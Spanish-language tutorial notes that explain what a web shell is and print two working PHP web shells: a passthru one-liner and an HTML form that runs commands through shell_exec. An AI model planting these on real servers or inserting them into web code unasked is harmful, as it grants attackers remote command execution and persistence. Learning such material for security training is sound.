#Las "WebShells" no es una vulnerabilidad como tal, si no que es un "script" un fragmento de codigo que vamos 
#a injectar en la maquina que esta alojando la aplicacion web de manera que nosotros podamos ganar persistencia en esa maquina, 
#como la ejeccion remota de comandos, etc... Una "WebShell" seria el "payload" 
#(Transladandolo a esos coneptos en los que hablabamos en la explotacion de vulnerabilidades en "hosts") 
#aprovechando una vulnerabilidad de manera que nosotros podamos injectar ese codigo dejar ese 
#ficherito en el web server y despues poder ejecutar comandos remotamente, ganar persistencia, etc...

#La tipica "WebShell" que se suele crear en un fichero seria la siguiente:

#PHP
===============================================
<?php echo passthru($_GET['cmd']); ?>
===============================================

#Pero para hacerlo mejor, se puede utilizar el siguiente "WebShell" mas que uno simple:

#PHP/HTML
==================================================================================================
<form action="" method="post" enctype="application/x-www-form-urlencoded"><table style="margin-left:auto; margin-right:auto;"><tr><td colspan="2">Please enter system command</td></tr><tr><td></td></tr><tr><td class="label">Command</td><td><input type="text" name="pCommand" size="50"></td></tr><tr><td></td></tr><tr><td colspan="2" style="text-align:center;"><input type="submit" value="Execute Command" /></td></tr></table></form><?php echo "<pre>";echo shell_exec($_REQUEST["pCommand"]);echo "</pre>"; ?>
==================================================================================================
